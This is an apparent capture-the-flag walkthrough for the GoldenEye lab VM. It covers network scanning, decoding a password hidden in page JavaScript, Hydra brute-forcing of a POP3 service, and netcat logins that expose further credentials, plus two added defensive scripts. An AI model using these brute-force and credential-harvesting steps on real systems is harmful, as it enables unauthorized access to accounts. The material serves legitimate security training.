Target machine: https://www.vulnhub.com/entry/goldeneye-1,240/
Difficulty: Medium (CTF)
Goal: obtain root privileges & find flag.txt
I. Information gathering
1. Run arp-scan -l to find the target's IP.
[Screenshot: Kali terminal. `sudo su`, then `arp-scan -l` run three times (arp-scan 1.9.7, 256 hosts). Recoverable output: 10.10.10.1 00:50:56:c0:00:08 VMware, Inc.; 10.10.10.2 00:50:56:ee:6b:0f VMware, Inc.; 10.10.10.254 00:50:56:f2:98:2c VMware, Inc.; on the third run a new host appears, 10.10.10.149 00:0c:29:29:77:a6 VMware, Inc., which is the target.]
2. Run the command: nmap -sP 192.168.182.0/24
[Screenshot: `nmap 10.10.10.149/24`. Recoverable output: 10.10.10.1 (00:50:56:C0:00:08, VMware) open ports 135/tcp msrpc, 139/tcp netbios-ssn, 443/tcp https, 445/tcp microsoft-ds, 996 filtered ports; 10.10.10.2 (00:50:56:EE:6B:0F, VMware) open port 53/tcp domain; 10.10.10.149 (00:0C:29:29:77:A6, VMware) open ports 25/tcp smtp and 80/tcp http, 998 closed ports; 10.10.10.254 (00:50:56:F2:98:2C, VMware) all 1000 scanned ports in one state (unreadable); 10.10.10.128 open port 22/tcp ssh. Nmap done: 256 IP addresses (5 hosts up).]
3. Run the command: nmap -sS -sV -T5 -A -p- 192.168.182.141
[Screenshot: `nmap -sS -sV -T5 -A -p- 10.10.10.149`. Recoverable output: 25/tcp open smtp, Postfix smtpd; 80/tcp open http, Apache httpd 2.4.7 (Ubuntu), http-server-header: Apache/2.4.7 (Ubuntu), http-title: GoldenEye Primary Admin Server; 55006/tcp open ssl/unknown, ssl-cert Not valid before: 2018-04-24T03:23:52, Not valid after: 2028-04-23T03:23:52; 55007/tcp open unknown; 65531 closed ports; MAC Address: 00:0C:29:29:77:A6 (VMware); Device type: general purpose; OS details: Linux 3.2 - 4.9; Network Distance: 1 hop; TRACEROUTE 1 hop 10.99 ms to 10.10.10.149; 1 IP address (1 host up) scanned in 179.09 seconds.]
4. Go to the /sev-home/ directory.
[Screenshot: http://10.10.10.149/ in the browser, page title "GoldenEye Primary Admin Server". Page text: "Severnaya Auxiliary Control Station / *TOP SECRET ACCESS* / Accessing Server Identity / Server Name: GOLDENEYE / User: UNKNOWN / Navigate to /sev-home/ to login".]
5. Inspect the home page's HTML for any useful hints (F12 developer tools).
[Screenshot: http://10.10.10.149/ with the browser's HTTP authentication prompt for /sev-home ("This site is asking you to sign in", username and password fields) and the Inspector panel open. Recoverable HTML: <html><head></head><body> with an element id "GoldenEyeText", a <span class="typeing"> element, a blinker <span>, and <script src="terminal.js"></script>.]
6. terminal.js reveals a username and a password; the password is stored in an encoded form.
[Screenshots: http://10.10.10.149/terminal.js, shown twice. Recoverable content: a `var data` object holding the GoldenEyeText strings ("SEVERNAYA AUXILIARY CONTROL STATION", "TOP SECRET ACCESS", "Accessing Server Identity", "Server Name: GOLDENEYE", "User: UNKNOWN", "Navigate to /sev-home/ to login"), followed by a comment block: "Boris, make sure you update your default password. My sources say MI6 may be planning to infiltrate. Be on the lookout for any suspicious network traffic... I encoded your password below..." then a run of HTML numeric character references with decimal code points 73 110 118 105 110 99 105 98 108 101 72 97 99 107 51 114, then "BTW Natalya says she can break your codes". The rest is the typing animation: `var allElements = document.getElementsByClassName("typeing")`, a for loop over the elements reading `data[currentElementId]`, a `type()` function that slices the text one character further each call, skips over tags (isTag), appends it to the element, and re-schedules itself with `setTimeout(type, 60)`.]
7. Decode it with Burp Suite's Decoder module.
[Screenshot: Burp Suite v2021.2.1 Decoder tab. Input: the numeric character reference string from terminal.js (code points 73 110 118 105 ... 51 114); "Decode as" HTML gives the output InvincibleHack3r.]
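The decoding Burp does here is nothing more than HTML numeric character reference expansion, which is why "encoding" a credential in client-side JavaScript protects nothing: anyone who can fetch the file can read it. The script below is an added example, not code from the page or from the GoldenEye VM; it decodes the constructed entity string (built from the code points visible in the screenshot) and scans a constructed excerpt modelled on the terminal.js comment for long runs of references, the check a site owner would run against their own served pages. The function names and the sample excerpt are this example's own.

```python
import html
import re

# Constructed sample: the decimal code points visible in the terminal.js
# screenshot (73 110 118 105 110 99 105 98 108 101 72 97 99 107 51 114),
# written as the HTML numeric character references the file stores them in.
ENCODED_PASSWORD = (
    "&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;"
    "&#72;&#97;&#99;&#107;&#51;&#114;"
)

# One reference: &#NNN; (decimal) or &#xHH; (hexadecimal).
_REF = re.compile(r"&#([xX][0-9A-Fa-f]+|[0-9]+);")


def _run_pattern(min_len: int) -> re.Pattern:
    """A run of at least min_len consecutive references with nothing between
    them: the shape an 'encoded' secret usually takes in page source."""
    return re.compile(r"(?:&#(?:[xX][0-9A-Fa-f]+|[0-9]+);){%d,}" % min_len)


def decode_numeric_refs(text: str) -> str:
    """Replace every numeric character reference in text with the character it names."""
    def repl(m: re.Match) -> str:
        body = m.group(1)
        code_point = int(body[1:], 16) if body[0] in "xX" else int(body)
        return chr(code_point)
    return _REF.sub(repl, text)


def find_encoded_runs(source: str, min_len: int = 4) -> list:
    """Decode every run of min_len or more consecutive references in source.

    Run this over the JavaScript and HTML you serve: a long run of &#NN;
    references inside a comment means a value was hidden rather than removed.
    """
    return [decode_numeric_refs(m.group(0))
            for m in _run_pattern(min_len).finditer(source)]


# Constructed excerpt in the style of the comment block in terminal.js; it is
# not the file itself (hypothetical sample input for this example).
SAMPLE_JS = (
    "// Boris, make sure you update your default password.\n"
    "// I encoded your password below...\n"
    "//\n"
    "// " + ENCODED_PASSWORD + "\n"
    "//\n"
    "// BTW Natalya says she can break your codes\n"
    'var allElements = document.getElementsByClassName("typeing");\n'
)


if __name__ == "__main__":
    for secret in find_encoded_runs(SAMPLE_JS):
        print("decoded run:", secret)
    # html.unescape from the standard library gives the same answer; the
    # hand-written decoder only shows that nothing cryptographic is involved.
    assert decode_numeric_refs(ENCODED_PASSWORD) == html.unescape(ENCODED_PASSWORD)
```

The lesson for the defender is the one the comment itself hints at ("Natalya says she can break your codes"): a default credential belongs in a password store and rotated, not in a comment that every visitor downloads.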
8. Then log in to /sev-home/.
[Screenshot: http://10.10.10.149/sev-home/ after logging in. Page text: "GOLDENEYE. GoldenEye is a Top Secret Soviet orbital weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO). Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system. Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port".]
9. Inspecting the page with F12 confirms the POP3 hint. The POP3 server ports are 55006 and 55007.
[Screenshot: http://10.10.10.149/sev-home/ with the Inspector panel open. Recoverable HTML: a <video> element with a poster image and <source src="moonraker.webm" type="video/webm">, a <div id="golden"> containing <h1>GoldenEye</h1> and the paragraphs quoted above (inline style: font-family Agenda-light, Arial Narrow, sans-serif; font-weight 180; color white; font-size 1.2rem), <script src="index.js"></script>, and an HTML comment naming the "Qualified GoldenEye Network Operator Supervisors: Natalya, Boris".]
10. Opening the port in the browser shows that 55007 is the POP3 service.
[Screenshot: browser request to 10.10.10.149:55007. The service answers "+OK GoldenEye POP3 Electronic-Mail System", then "-ERR Unknown command." for each line of the HTTP request, and finally "-ERR Disconnected for inactivity".]
11. Generate a user list and start brute-forcing the passwords.
[Screenshot: `hydra -L x.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.149 -s 55007 pop3`. Output shows the Hydra banner, "[DATA] attacking pop3://10.10.10.149:55007/", "[STATUS] ... tries/min" lines, and many "[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication" lines.]
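Seen from the server, the wordlist attack above is a burst of failed PLAIN authentications for one account from one source address, ending in a successful login. Below is an added example, not part of the original writeup, of the detection logic a defender would run over the POP3 server's login log: it parses lines in the style of Dovecot's pop3-login messages, keeps a sliding window of failures per source IP, and raises a medium finding when the window fills and a high finding when a login succeeds right after such a burst. The log lines, IP addresses, times and threshold values are constructed for this example; the function names are this example's own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in the style of Dovecot's pop3-login messages. They
# are not taken from the target machine: six failures for one account from one
# source inside a few seconds, then a successful login, then one unrelated
# failure from another source.
SAMPLE_LOG = """\
Apr 25 02:10:01 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.10.10.128, lip=10.10.10.149
Apr 25 02:10:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.10.10.128, lip=10.10.10.149
Apr 25 02:10:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.10.10.128, lip=10.10.10.149
Apr 25 02:10:04 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.10.10.128, lip=10.10.10.149
Apr 25 02:10:05 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.10.10.128, lip=10.10.10.149
Apr 25 02:10:06 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.10.10.128, lip=10.10.10.149
Apr 25 02:10:07 ubuntu dovecot: pop3-login: Login: user=<boris>, method=PLAIN, rip=10.10.10.128, lip=10.10.10.149
Apr 25 02:15:00 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=10.10.10.50, lip=10.10.10.149
"""

# Syslog timestamp, host, the pop3-login event text, then the user/rip/lip
# fields. The event text is everything up to ": user=<", so inactivity
# disconnects ("Disconnected: Inactivity (auth failed, ...)") parse as well.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<event>.+?): user=<(?P<user>[^>]*)>, method=\S+, "
    r"rip=(?P<rip>[\d.]+), lip=[\d.]+"
)


def parse_line(line: str, year: int = 2018):
    """Return a dict for a pop3-login line, or None for anything else.
    Syslog lines carry no year, so the caller supplies one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {
        "ts": ts,
        "user": m["user"],
        "rip": m["rip"],
        "ok": m["event"] == "Login",
        "failed": "auth failed" in m["event"],
    }


def detect_bruteforce(lines, threshold: int = 5, window_secs: int = 60):
    """Flag sources with >= threshold failures inside window_secs (medium) and
    a successful login from such a source while the window is still hot (high)."""
    findings = []
    recent = defaultdict(deque)   # source IP -> timestamps of recent failures
    flagged = set()               # sources already reported at medium severity
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["rip"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_secs:
            q.popleft()           # drop failures that fell out of the window
        if ev["failed"]:
            q.append(ev["ts"])
            if len(q) >= threshold and ev["rip"] not in flagged:
                flagged.add(ev["rip"])
                findings.append({"severity": "medium", "rip": ev["rip"],
                                 "user": ev["user"], "failures": len(q),
                                 "at": ev["ts"]})
        elif ev["ok"] and len(q) >= threshold:
            # Success after a burst of failures is the signature of a guessed
            # password, not of a user who mistyped once.
            findings.append({"severity": "high", "rip": ev["rip"],
                             "user": ev["user"], "failures": len(q),
                             "at": ev["ts"]})
    return findings


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:6} {f['rip']} user={f['user']} "
              f"failures={f['failures']} at={f['at']:%H:%M:%S}")
```

On a real mail server the same rule belongs in fail2ban or the SIEM, and the high-severity case should trigger a password reset for the account; a non-default port, as the /sev-home page admits, does nothing against a scanner that already found 55007.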
12. Connect with nc. The credentials found are user boris / password secret1! and user natalya / password bird.
Then start reading the mail.
[Screenshot: `nc 10.10.10.149 55007`. Session: "+OK GoldenEye POP3 Electronic-Mail System"; USER boris / +OK; PASS secret1! / +OK Logged in.; LIST / +OK 3 messages: 1 544, 2 373, 3 921; RETR 1 / +OK 544 octets. Headers: Return-Path: <root@127.0.0.1.goldeneye>, X-Original-To: boris, Delivered-To: boris@ubuntu, Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id D9E47454B1 for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT), Message-Id: <20180425022326.D9E47454B1@ubuntu>, From: root@127.0.0.1.goldeneye. The body (partly unreadable) ends "... because I trust you and the other admins here."]
13. Log in as natalya / bird and read the mail.
[Screenshot: `nc 10.10.10.149 55007`. Session: USER natalya / +OK; PASS bird / +OK Logged in.; LIST / +OK 2 messages: 1 631, 2 1048 (two mistyped commands answered "-ERR Unknown command: R" and "-ERR Unknown command: RETER"); RETR 1 / +OK 631 octets. Headers: Return-Path: <root@ubuntu>, X-Original-To: natalya, Delivered-To: natalya@ubuntu, Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id D5EDA454B1 for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT), Message-Id: <20180425024542.D5EDA454B1@ubuntu>, From: root@ubuntu. Body: "Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training ... Also, be cautious of possible network breaches. We have intel that GoldenEye is being ..." (cut off). RETR 2 / +OK 1048 octets, Received ... with SMTP id 17C96454B1 for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT), From: root@ubuntu; body partly unreadable here but containing "ok, user creds are: username: xenia password: RCP90rulez!", "Boris verified her as a valid contractor so just create the account ok?", the internal domain severnaya-station.com/gnocertdir, "make sure to edit your host file since you usually work remote off-network..." and "Since you're a Linux user just point this servers IP to severnaya-station.com".]
14. Sensitive information is disclosed in the mail.
[Screenshot: the second mail enlarged. Message-Id: <20180425031956.17C96454B1@ubuntu>, Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT), From: root@ubuntu. Body: "Ok Natalya, I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially if it's related to security... even if it's not, just enter it in under the guise of "security"... it'll get the change order escalated without much hassle :) Ok, user creds are: username: xenia password: RCP90rulez! Boris verified her as a valid contractor so just create the account ok? And if you didn't have the URL on our internal Domain: severnaya-station.com/gnocertdir **Make sure to edit your host file since you usually work remote off-network.... Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts." The session is then ended with ^C.]
15. Edit /etc/hosts and add severnaya-station.com.
Username: xenia
Password: RCP90rulez!
Domain: severnaya-station.com
URL: severnaya-station.com/gnocertdir
Following the hint in the mail, we add the local hostname severnaya-station.com.
16. Browse to it locally.
17. After logging in, a user named doak is discovered.
18. Add it to the user list.
19. Brute-force this user's password.
hydra -L x.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.149 -s 55007 pop3
20. Connect with nc.